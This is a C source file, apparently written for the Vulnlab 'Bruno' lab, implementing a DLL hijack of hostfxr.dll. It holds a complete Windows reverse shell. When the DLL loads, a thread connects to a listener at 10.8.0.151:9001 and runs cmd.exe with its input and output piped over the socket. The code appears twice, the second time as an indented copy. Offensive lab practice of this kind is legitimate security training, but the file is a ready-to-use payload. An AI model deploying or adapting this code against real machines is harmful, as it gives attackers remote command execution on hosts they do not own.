caueb/dllmain.c

## dllmain.c
// Vulnlab: Bruno
// DLL Hijack of hostfxr.dll

#include <winsock2.h>
#include <stdio.h>

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

#pragma comment(lib, "ws2_32")

DWORD WINAPI RunMe() {
    WSADATA wsaData;
    SOCKET wSock;
    struct sockaddr_in conn;

    // listener ip & port
    char* ip = "10.8.0.151";
    short port = 9001;

    // init socket lib
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    // create socket
    wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

    conn.sin_family = AF_INET;
    conn.sin_port = htons(port);
    conn.sin_addr.s_addr = inet_addr(ip);

    // connect to remote host
    WSAConnect(wSock, (SOCKADDR*)&conn, sizeof(conn), NULL, NULL, NULL, NULL);

    // start cmd.exe with redirected streams
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;

    // redirect stdin, stdout, stderr to socket
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;

    CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    exit(0);
}


BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {

    HANDLE threadHandle;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        threadHandle = CreateThread(NULL, 0, RunMe, NULL, 0, NULL);
        CloseHandle(threadHandle);
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
	// Vulnlab: Bruno
	// DLL Hijack of hostfxr.dll

	#include <winsock2.h>
	#include <stdio.h>

	#define _CRT_SECURE_NO_DEPRECATE
	#pragma warning (disable : 4996)

	#pragma comment(lib, "ws2_32")

	DWORD WINAPI RunMe() {
	WSADATA wsaData;
	SOCKET wSock;
	struct sockaddr_in conn;

	// listener ip & port
	char* ip = "10.8.0.151";
	short port = 9001;

	// init socket lib
	WSAStartup(MAKEWORD(2, 2), &wsaData);

	// create socket
	wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	conn.sin_family = AF_INET;
	conn.sin_port = htons(port);
	conn.sin_addr.s_addr = inet_addr(ip);

	// connect to remote host
	WSAConnect(wSock, (SOCKADDR*)&conn, sizeof(conn), NULL, NULL, NULL, NULL);

	// start cmd.exe with redirected streams
	STARTUPINFO si;
	PROCESS_INFORMATION pi;

	memset(&si, 0, sizeof(si));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESTDHANDLES;

	// redirect stdin, stdout, stderr to socket
	si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;

	CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
	exit(0);
	}


	BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {

	HANDLE threadHandle;

	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	threadHandle = CreateThread(NULL, 0, RunMe, NULL, 0, NULL);
	CloseHandle(threadHandle);
	case DLL_THREAD_ATTACH:
	break;
	case DLL_THREAD_DETACH:
	break;
	case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
	}